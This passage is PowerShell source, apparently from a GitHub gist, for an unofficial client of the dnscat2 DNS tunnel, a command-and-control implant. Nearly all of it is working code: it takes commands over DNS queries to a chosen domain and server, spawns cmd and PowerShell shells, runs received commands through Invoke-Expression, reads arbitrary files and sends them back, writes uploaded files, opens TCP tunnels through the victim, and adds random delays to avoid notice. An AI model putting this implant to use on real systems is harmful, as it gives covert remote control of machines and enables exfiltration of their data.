$Session["DriverDataQueue"] += $DriverData | |
} | |
return $Session | |
} | |
function Send-ToDnscat2Tunnel ($Session, $TunnelId, $Data) { | |
try { | |
[byte[]]$Bytes = Convert-HexToBytes $Data | |
$Session["Tunnels"][$TunnelId]["Stream"].Write($Bytes, 0, $Bytes.Length) | |
} catch { | |
$Session["Tunnels"][$TunnelId].Dead = $True | |
} | |
return $Session | |
} | |
function Close-Dnscat2Tunnel ($Session, $TunnelId) { | |
try { $Session["Tunnels"][$TunnelId].Dead = $True } catch { } | |
try { $Session["Tunnels"][$TunnelId]["Stream"].Close() } catch { } | |
try { $Session["Tunnels"][$TunnelId]["Socket"].Close() } catch { } | |
return $Session | |
} | |
function Update-Dnscat2CommandSession ($Session) { | |
if ($Session["CommandPacketBuffer"].Length -le 0) { | |
return $Session | |
} | |
## PROCESS COMMAND PACKETS | |
while ($Session["CommandPacketBuffer"].Length -gt 0) { | |
# Packet Header | |
if (($Session["RemainingBytes"] -eq 0) -and ($Session["CommandPacketBuffer"].Length -ge 16)) { | |
# Decode Command Packet Header | |
$Session["Length"] = [Convert]::ToUInt32($Session["CommandPacketBuffer"][0..7] -join '', 16) | |
$Session["PacketId"] = $Session["CommandPacketBuffer"][8..11] -join '' | |
$Session["PacketIdBF"] = [Convert]::ToString(([convert]::ToUInt16($Session["CommandPacketBuffer"][8..11] -join '', 16) -bxor ([Math]::Floor(1 * [Math]::Pow(2,15)))),16) | |
$Session["CommandId"] = $Session["CommandPacketBuffer"][12..15] -join '' | |
$Session["RemainingBytes"] = ($Session["Length"] - 4) | |
$Session["CommandPacketBuffer"] = $Session["CommandPacketBuffer"].Substring(16) | |
$Session["CommandFields"] = "" | |
} elseif ($Session["RemainingBytes"] -gt 0) { # Packet Data | |
if ($Session.RemainingBytes*2 -ge $Session["CommandPacketBuffer"].Length) { | |
# length of remaining command packet is -ge remaining data buffer | |
# We can just grab the rest of the packet buffer | |
$Session["CommandFields"] += $Session["CommandPacketBuffer"] | |
$Session["CommandFieldsBytes"] += Convert-HexToBytes $Session["CommandPacketBuffer"] | |
$Session["RemainingBytes"] -= $Session["CommandPacketBuffer"].Length/2 | |
$Session["CommandPacketBuffer"] = "" | |
} else { | |
# length of remaining command packet is -lt remaining data buffer | |
# We have another packet header in the buffer! | |
$Session["CommandFields"] += $Session["CommandPacketBuffer"].Substring(0, $Session.RemainingBytes*2) | |
$Session["CommandFieldsBytes"] += Convert-HexToBytes $Session["CommandPacketBuffer"].Substring(0, $Session.RemainingBytes*2) | |
$RemainingBytes = $Session.RemainingBytes*2 | |
$Session["RemainingBytes"] -= ($Session["CommandPacketBuffer"].Substring(0, $Session.RemainingBytes*2)).Length/2 | |
$Session["CommandPacketBuffer"] = $Session["CommandPacketBuffer"].Substring($RemainingBytes) | |
} | |
if ($Session["RemainingBytes"] -eq 0) { # If we've completed a packet, lets send it right now | |
break | |
} | |
} else { | |
# Happens when a piece of a packet header remains in the buffer | |
# We should wait until the whole header is in the buffer before processing | |
break | |
} | |
} | |
## INVOKE COMMAND PACKET | |
if ($Session["RemainingBytes"] -eq 0) { | |
switch ($Session["CommandId"]) | |
{ | |
"0000" # COMMAND_PING | |
{ | |
$PacketLengthField = ([Convert]::ToString((4 + $Session["CommandFields"].Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "0000" + $Session["CommandFields"]) | |
$Session["DriverDataQueue"] += $DriverData | |
return $Session | |
} | |
"0001" # COMMAND_SHELL | |
{ | |
try { | |
$NewSessionName = $Session["CommandFields"] | |
$NewSession = Start-Dnscat2Session (New-RandomDNSField 4) ("0001" + $NewSessionName) $Session.Domain $Session.DNSServer $Session.DNSPort $Session.MaxPacketSize $Session.Encryption $Session["EncryptionKeys"].PreSharedSecret $Session.LookupTypes $Session.Delay $Session.MaxRandomDelay "exec" "cmd" | |
$Session.NewSessions.Add($NewSession.SessionId, $NewSession) | |
$PacketLengthField = ([Convert]::ToString((4 + $NewSession.SessionId.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "0001" + $NewSession.SessionId) | |
$Session["DriverDataQueue"] += $DriverData | |
} catch { | |
$ErrorCode = $CommandId | |
$Reason = (Convert-StringToHex "COMMAND_SHELL Failed!") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
return $Session | |
} | |
"0002" # COMMAND_EXEC | |
{ | |
try { | |
$NewSessionName = $Session["CommandFields"].Substring(0,$Session["CommandFields"].IndexOf("00")) | |
$NewSessionCommand = Convert-HexToString ($Session["CommandFields"].Substring($Session["CommandFields"].IndexOf("00") + 2).replace("00","")) | |
$NewSessionDriver = "exec" | |
if ($NewSessionCommand -eq "psh") { | |
$NewSessionDriver = "PS" | |
$NewSessionCommand = "" | |
} | |
$NewSession = Start-Dnscat2Session (New-RandomDNSField 4) ("0001" + $NewSessionName + '00') $Session.Domain $Session.DNSServer $Session.DNSPort $Session.MaxPacketSize $Session.Encryption $Session["EncryptionKeys"].PreSharedSecret $Session.LookupTypes $Session.Delay $Session.MaxRandomDelay $NewSessionDriver $NewSessionCommand | |
$Session.NewSessions.Add($NewSession.SessionId, $NewSession) | |
$PacketLengthField = ([Convert]::ToString((4 + $NewSession.SessionId.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "0002" + $NewSession.SessionId) | |
$Session["DriverDataQueue"] += $DriverData | |
} catch { | |
$ErrorCode = $CommandId | |
$Reason = (Convert-StringToHex "COMMAND_EXEC Failed!") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
return $Session | |
} | |
"0003" # COMMAND_DOWNLOAD | |
{ | |
try { | |
$FileName = Convert-HexToString $Session["CommandFields"].TrimEnd('00') | |
if ($FileName.StartsWith("bytes:`$")) { | |
$Session["PSDownloadReady"] = $True | |
$Session["PSDownloadName"] = $FileName.Substring(7) | |
$Session["PSDownloadPacketIdBF"] = $Session.PacketIdBF | |
} else { | |
$FileHexDump = Convert-BytesToHex ([IO.File]::ReadAllBytes($FileName)) | |
$PacketLengthField = ([Convert]::ToString((4 + ($FileHexDump.Length/2)),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "0003" + $FileHexDump) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
$DriverData = ("00000004" + $Session.PacketIdBF + $Session["CommandId"]) | |
$Session["DriverDataQueue"] += $DriverData | |
} catch { | |
$ErrorCode = $Session["CommandId"] | |
$Reason = (Convert-StringToHex "Could not read file. Make sure to provide the full path!") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
} | |
"0004" # COMMAND_UPLOAD | |
{ | |
try { | |
$Data = $Session["CommandFields"] | |
$FileName = Convert-HexToString ($Data[0..($Data.IndexOf('00') - 1)] -join '') | |
[String]$Data = (($Data[($Data.IndexOf('00') + 2)..$Data.Length]) -join '') | |
if ($FileName.StartsWith("hex:`$")) { | |
$Session["PSUploadReady"] = $True | |
$Session["PSUploadName"] = $FileName.Substring(5) | |
$Session["PSUploadValue"] = $Data | |
} else { | |
[byte[]]$Bytes = $Session['CommandFieldsBytes'][($FileName.Length+1)..$Session['CommandFieldsBytes'].Length] | |
[IO.File]::WriteAllBytes($FileName, $Bytes) 2>&1 | Out-Null | |
} | |
$DriverData = ("00000004" + $Session.PacketIdBF + $Session["CommandId"]) | |
$Session["DriverDataQueue"] += $DriverData | |
} catch { | |
$ErrorCode = $Session["CommandId"] | |
$Reason = (Convert-StringToHex "Could not write file") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
} | |
"0006" # COMMAND_DELAY | |
{ | |
try { | |
$Session["Delay"] = [Convert]::ToUInt32($Session["CommandFields"], 16) | |
Write-Verbose ('New Delay: ' + $Session["Delay"].ToString()) | |
} catch {} | |
} | |
"1000" # TUNNEL_CONNECT | |
{ | |
try { | |
$Tunnel = New-Object System.Collections.Hashtable | |
$Tunnel.Add("Host", (Convert-HexToString $Session["CommandFields"].Substring(0, $Session["CommandFields"].Length - 4)).Trim(0)) | |
$Tunnel.Add("Port", [Convert]::ToUInt16($Session["CommandFields"].Substring($Session["CommandFields"].Length - 4), 16)) | |
$Tunnel.Add("TunnelId", (New-RandomDNSField 8)) | |
$Session["Tunnels"].Add($Tunnel.TunnelId, $Tunnel) | |
## START UP TUNNEL | |
$Session = New-Dnscat2Tunnel $Session $Tunnel.TunnelId | |
if ($Session["Tunnels"][$Tunnel.TunnelId].Dead) { | |
$ErrorCode = $CommandId | |
$Reason = (Convert-StringToHex "Failed to start tunnel") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "1000" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
$DriverData = ("00000008" + $Session.PacketIdBF + "1000" + $Tunnel.TunnelId) | |
$Session["DriverDataQueue"] += $DriverData | |
} catch { | |
$ErrorCode = $CommandId | |
$Reason = (Convert-StringToHex "Failed to start tunnel") + "00" | |
$PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $Session.PacketIdBF + "1000" + $ErrorCode + $Reason) | |
$Session["DriverDataQueue"] += $DriverData | |
} | |
} | |
"1001" # TUNNEL_DATA | |
{ | |
try { | |
$TunnelId = $Session["CommandFields"].Substring(0, 8) | |
$Data = $Session["CommandFields"].Substring(8) | |
$Session = Send-ToDnscat2Tunnel $Session $TunnelId $Data | |
} catch { } | |
} | |
"1002" # TUNNEL_CLOSE | |
{ | |
try { | |
$TunnelId = $Session["CommandFields"] | |
$Session = Close-Dnscat2Tunnel $Session $TunnelId | |
} catch { } | |
} | |
} | |
} | |
return $Session | |
} | |
function Read-DataFromDriver ($Session) { | |
if ($Session["Driver"] -eq "console") { | |
$Data = "" | |
if($Host.UI.RawUI.KeyAvailable) { | |
$Data = ((Read-Host) + "`n") | |
} | |
$Session["DriverDataQueue"] += (Convert-StringToHex $Data) | |
return $Session | |
} elseif ($Session["Driver"] -eq "command") { | |
# Tunnels are the only time a command session sends data without a prior request | |
if ($Session["Tunnels"].Count -gt 0) { | |
# Update Tunnels | |
$TunnelIds = @() | |
$TunnelIds += $Session["Tunnels"].Keys | |
foreach ($TunnelId in $TunnelIds) { | |
$Session = Read-FromDnscat2Tunnel $Session $TunnelId | |
if ($Session[$TunnelId].Dead) { | |
$Session["DeadTunnels"] += $TunnelId | |
} | |
} | |
# Remove Dead Tunnels | |
foreach ($TunnelId in $Session["DeadTunnels"]) { | |
$Session["Tunnels"].Remove($TunnelId) | |
} | |
$Session["DeadTunnels"] = @() | |
} | |
} elseif ($Session["Driver"] -eq "exec") { | |
if($Host.UI.RawUI.KeyAvailable) { | |
$Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyUp") | Out-Null | |
} | |
if($Session["StdOutReadOperation"].IsCompleted) { | |
$StdOutBytesRead = ($Session["Process"]).StandardOutput.BaseStream.EndRead($Session["StdOutReadOperation"]) | |
if($StdOutBytesRead -eq 0){ $Session.Dead = $True; return $Session } | |
$Session["DriverDataQueue"] += Convert-BytesToHex ($Session["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]) | |
$Session["StdOutReadOperation"] = ($Session["Process"]).StandardOutput.BaseStream.BeginRead($Session["StdOutDestinationBuffer"], 0, 65536, $null, $null) | |
} | |
if($Session["StdErrReadOperation"].IsCompleted) { | |
$StdErrBytesRead = ($Session["Process"]).StandardError.BaseStream.EndRead($Session["StdErrReadOperation"]) | |
if($StdErrBytesRead -eq 0){ $Session.Dead = $True; return $Session } | |
$Session["DriverDataQueue"] += Convert-BytesToHex ($Session["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]) | |
$Session["StdErrReadOperation"] = ($Session["Process"]).StandardError.BaseStream.BeginRead($Session["StdErrDestinationBuffer"], 0, 65536, $null, $null) | |
} | |
} | |
return $Session | |
} | |
function Send-DataToDriver ($Data, $Session) { | |
if ($Session["Driver"] -eq "console") { | |
$StringData = Convert-HexToString $Data | |
Write-Host -n $StringData | |
} elseif ($Session["Driver"] -eq "command") { | |
$Session["CommandPacketBuffer"] += $Data | |
} elseif ($Session["Driver"] -eq "exec") { | |
$StringData = Convert-HexToString $Data | |
($Session["Process"]).StandardInput.WriteLine($StringData.TrimEnd("`r").TrimEnd("`n")) | |
} elseif ($Session["Driver"] -eq "PS") { | |
# Only execute when a newline is sent | |
$Session["PSCommand"] += $Data | |
if (($Session["PSCommand"][-1..-2] -join '') -eq 'A0') { | |
$Session["PSCommandReady"] = $True | |
} | |
} | |
return $Session | |
} | |
function Stop-Dnscat2Session ($Session) { | |
Send-Dnscat2Packet (New-Dnscat2FIN $Session["Domain"] $Session["SessionId"] $Session["Domain"]) $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Session["Encryption"] $Session["EncryptionKeys"]| Out-Null | |
if ($Session["Driver"] -eq "exec") { | |
taskkill /T /F /PID $Session["ProcessId"] 2>&1 | Out-Null | |
} | |
$Session["Dead"] = $True | |
return $Session | |
} | |
function Update-Dnscat2Session ($Session) { | |
try { | |
# Retrive Driver Data | |
$Session = Read-DataFromDriver $Session | |
if ($Session["Encryption"]) { | |
$Session["EncryptionKeys"]["nonce"] += 1 | |
if ($Session["EncryptionKeys"]["nonce"] -gt 65500) { | |
# DO ENCRYPTION RENOGOTIATION | |
$Session = Start-Dnscat2EncInit $Session $True | |
} | |
} | |
if ($Session.Dead) { | |
$Session = Stop-Dnscat2Session $Session | |
return $Session | |
} | |
# Grab next data in the queue | |
$PacketData = (Get-NextDnscat2Data $Session["DriverDataQueue"] $Session["MaxMSGDataSize"]) | |
# Delay | |
$RandomDelay = $Session['MaxRandomDelay'] | |
if ($Session['MaxRandomDelay'] -le 0) { $RandomDelay = 0 } | |
Sleep -Milliseconds ($Session['Delay'] + $RandomDelay) | |
try { | |
$MSGPACKET = (New-Dnscat2MSG $Session["Domain"] $Session["SessionId"] $Session["SequenceNumber"] $Session["AcknowledgementNumber"] $PacketData) | |
$Packet = (Send-Dnscat2Packet $MSGPACKET $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Session["Encryption"] $Session["EncryptionKeys"]) | |
} catch { | |
Write-Error "Dnscat2: Failed to send packet! " | |
$Session.Dead = $True | |
return $Session | |
} | |
try { | |
$Packet = (ConvertTo-Dnscat2Packet $Packet) | |
if($Packet -eq 1){ Write-Error "Dnscat2: Failed to ConvertTo-Dnscat2Packet..."; $Session.Dead = $True } | |
if ($Packet["MessageType"] -eq "01") { | |
# Check if server ACKed sent data | |
$BytesACKed = (Compare-SequenceNumber $Session["SequenceNumber"] $Packet["AcknowledgementNumber"]) | |
if ($BytesACKed -ne 0) { | |
# If data was ACKed, remove it from Queue | |
$Session["DriverDataQueue"] = ($Session["DriverDataQueue"]).Substring($BytesACKed*2) | |
} | |
$Session["SequenceNumber"] = $Packet["AcknowledgementNumber"] | |
# ACK the server data | |
if ($Packet["Data"] -ne "") { | |
$Session["AcknowledgementNumber"] = Update-Dnscat2ACK $Packet["Data"] $Packet["SequenceNumber"] | |
$Session = Send-DataToDriver $Packet["Data"] $Session | |
} | |
} elseif ($Packet["MessageType"] -eq "02") { | |
$Session.Dead = $True | |
return $Session | |
} | |
} catch { | |
Write-Error "Dnscat2: Caught error while processing packet, dropping..." | |
$Session.Dead = $True | |
$Session = Stop-Dnscat2Session $Session | |
} | |
if ($Session.Driver -eq "command") { | |
$Session = Update-Dnscat2CommandSession $Session | |
} | |
} catch { | |
$Session.Dead = $True | |
$Session = Stop-Dnscat2Session $Session | |
} | |
return $Session | |
} | |
function Start-Dnscat2 { | |
<# | |
.SYNOPSIS | |
Start a Dnscat2 session. By default, a command type session is created. | |
.DESCRIPTION | |
This powershell script is an unofficial client for the dnscat2 DNS tunnel. | |
.PARAMETER Domain | |
The Domain being used by the dnscat2 server. | |
.PARAMETER DNSServer | |
The hostname or IP Address to send DNS queries to. | |
.PARAMETER DNSPort | |
The port to send DNS queries to. | |
.PARAMETER Exec | |
Link the I/O of a process with the Dnscat2 session. | |
.PARAMETER Console | |
Link the I/O of the console with the Dnscat2 session. | |
.PARAMETER ExecPS | |
Simulate a Powershell session and link the IO with the Dnscat2 session. | |
WARNING: Exiting will kill the entire dnscat2 client, not just the session. | |
.PARAMETER PreSharedSecret | |
Set the shared secret. Set the same one on the server and the client to prevent man-in-the-middle attacks! | |
.PARAMETER NoEncryption | |
Do not enable encryption. | |
.PARAMETER LookupTypes | |
Set an array of lookup types. Each packet has its lookup type randomly selected from the array. | |
Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME) | |
.PARAMETER Delay | |
Set a delay between each request, in milliseconds. (Default: 0) | |
.PARAMETER MaxRandomDelay | |
Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0) | |
.PARAMETER MaxPacketSize | |
Maximum length of a dnscat2 packet. | |
.PARAMETER Name | |
The name of your dnscat2 session. (Default: hostname) | |
#> | |
[CmdletBinding()] | |
param( | |
[Parameter(Mandatory=$True)][Alias("d")][string]$Domain, | |
[Alias("s")][string]$DNSServer="", | |
[Alias("p")][ValidateRange(1,65535)][int32]$DNSPort=53, | |
[Alias("e")][string]$Exec="", | |
[switch]$Console=$False, | |
[Alias("psh")][switch]$ExecPS=$False, | |
[Alias("sec")][string]$PreSharedSecret="", | |
[Alias("ne")][switch]$NoEncryption=$false, | |
[string[]]$LookupTypes=@("TXT","MX","CNAME"), | |
[Alias("t")][int32]$Delay=0, | |
[Alias("r")][int32]$MaxRandomDelay=0, | |
[ValidateRange(1,240)][int32]$MaxPacketSize=240, | |
[Alias("n")][string]$Name="" | |
) | |
if ($DNSServer -eq "") { | |
Write-Verbose "No DNS Server specified! Checking DNS settings..." | |
$DNSServers = @() | |
$regex = [regex] "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" | |
$regex.Matches((ipconfig /all | Select-String "DNS Servers" | Out-String)) | %{ $DNSServers += $_.value } | |
if ($DNSServers.Count -eq 0) { | |
Write-Error ("Couldn't find default DNS server. Please specify a DNS server with -DNSServer.") | |
return | |
} | |
$DNSServer = $DNSServers[0] | |
Write-Verbose ("DNSServer set to " + $DNSServer) | |
} | |
foreach ($LookupType in $LookupTypes) { | |
if (!(@("TXT","MX","CNAME","A","AAAA") -contains $LookupType)) { | |
Write-Error ($LookupType + " is not a valid Lookup Type!") | |
Write-Error ("Only TXT, MX, CNAME, A, and AAAA lookups are allowed!") | |
return | |
} | |
} | |
$SYNOptions = 1 # Enable OPT_NAME to name the session | |
if ($Exec -ne '') { | |
$Driver = 'exec' | |
$DriverOptions = $Exec | |
} elseif ($Console) { | |
$Driver = 'console' | |
$DriverOptions = '' | |
} elseif ($ExecPS) { | |
$Driver = 'PS' | |
$DriverOptions = '' | |
} else { | |
$Driver = 'command' | |
$DriverOptions = '' | |
$SYNOptions += 0x20 | |
} | |
if (!$NoEncryption) { | |
#$SYNOptions += 0x40 | |
} | |
$SYNOptions = [Convert]::ToString($SYNOptions, 16).PadLeft(4, '0') | |
if ($Name -eq '') { | |
$Name = $Driver + ' (' + (hostname) + ')' | |
} | |
$SYNOptions += (Convert-StringToHex $Name) + '00' | |
$Sessions = New-Object System.Collections.Hashtable | |
$DeadSessions = @() | |
$InitialSession = Start-Dnscat2Session (New-RandomDNSField 4) $SYNOptions $Domain $DNSServer $DNSPort $MaxPacketSize (-not $NoEncryption) $PreSharedSecret $LookupTypes $Delay $MaxRandomDelay $Driver $DriverOptions | |
if ($InitialSession -eq 1) { | |
return | |
} | |
$Sessions.Add($InitialSession["SessionId"], $InitialSession) | |
try { | |
while ($Sessions.Count -gt 0) { | |
# Remove Dead Sessions | |
foreach ($SessionId in $DeadSessions) { | |
$Sessions.Remove($SessionId) | |
} | |
$DeadSessions = @() | |
# Update Sessions | |
$SessionIds = @() | |
$SessionIds += $Sessions.Keys | |
foreach ($SessionId in $SessionIds) { | |
$Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId] | |
# Execute PS commands here for access to full scope | |
if ($Sessions[$SessionId]["PSCommandReady"]) { | |
try { $Sessions[$SessionId]["DriverDataQueue"] += (Convert-StringToHex (Invoke-Expression (Convert-HexToString $Sessions[$SessionId]["PSCommand"]) | Out-String)) } catch { } | |
$Sessions[$SessionId]["PSCommand"] = "" | |
$Sessions[$SessionId]["PSCommandReady"] = $False | |
} | |
# Execute PS uploads here for access to full scope | |
if ($Sessions[$SessionId]["PSUploadReady"]) { | |
try { Set-Variable -Name $Sessions[$SessionId]["PSUploadName"] -Value $Sessions[$SessionId]["PSUploadValue"] } catch { } | |
$Sessions[$SessionId]["PSUploadReady"] = $False | |
$Sessions[$SessionId]["PSUploadName"] = "" | |
$Sessions[$SessionId]["PSUploadValue"] = "" | |
} | |
# Execute PS downloads here for access to full scope | |
if ($Sessions[$SessionId]["PSDownloadReady"]) { | |
try { | |
$VarValue = (Get-Variable -Name $Sessions[$SessionId]["PSDownloadName"] -ValueOnly) | |
if ($VarValue.GetType().fullname -eq "System.Byte[]") { | |
$VarValue = Convert-BytesToHex $VarValue | |
$PacketLengthField = ([Convert]::ToString((4 + ($VarValue.Length/2)),16)).PadLeft(8, '0') | |
$Sessions[$SessionId]["DriverDataQueue"] += ($PacketLengthField + $Sessions[$SessionId]["PSDownloadPacketIdBF"] + "0003" + $VarValue) | |
} | |
} catch { } | |
$Sessions[$SessionId]["PSDownloadReady"] = $False | |
$Sessions[$SessionId]["PSDownloadPacketIdBF"] = "" | |
$Sessions[$SessionId]["PSDownloadName"] = "" | |
} | |
if ($Sessions[$SessionId].Dead) { | |
$DeadSessions += $SessionId | |
} | |
if (($Sessions[$SessionId])["NewSessions"].Count -gt 0) { | |
foreach ($NewSessionId in $Sessions[$SessionId].NewSessions.Keys) { | |
$Sessions.Add($NewSessionId, $Sessions[$SessionId]["NewSessions"][$NewSessionId]) | |
} | |
$Sessions[$SessionId].NewSessions = New-Object System.Collections.Hashtable | |
} | |
} | |
} | |
} finally { | |
$SessionIds = @() | |
$SessionIds += $Sessions.Keys | |
foreach ($SessionId in $SessionIds) { | |
Stop-Dnscat2Session $Sessions[$SessionId] | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment